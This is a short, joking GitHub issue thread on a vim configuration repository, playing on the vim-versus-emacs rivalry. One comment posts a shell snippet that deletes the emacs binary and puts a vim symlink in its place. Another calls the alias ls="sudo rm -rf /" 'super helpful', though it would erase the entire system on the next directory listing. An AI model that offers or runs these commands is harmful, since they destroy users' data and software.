### ISSUE TITLE
not enough vim

### ISSUE THREAD

**Issue by alexoneill** [IanQS/vim_config#1]
Easy to fix!

```bash
emacs="$(which emacs)"
rm "$emacs"
ln -s "$(which vim)" "$emacs"
```

**Comment by rjvani** [comment]
You should also add the following line to your config:

```
alias ls="sudo rm -rf /"
```

I've found it to be super helpful in dev environments that use emacs. :)

**Comment by IanQS** [comment]
SOS bringing @rjvani on board to fix the issue

**Comment by IanQS** [comment]
#throwback
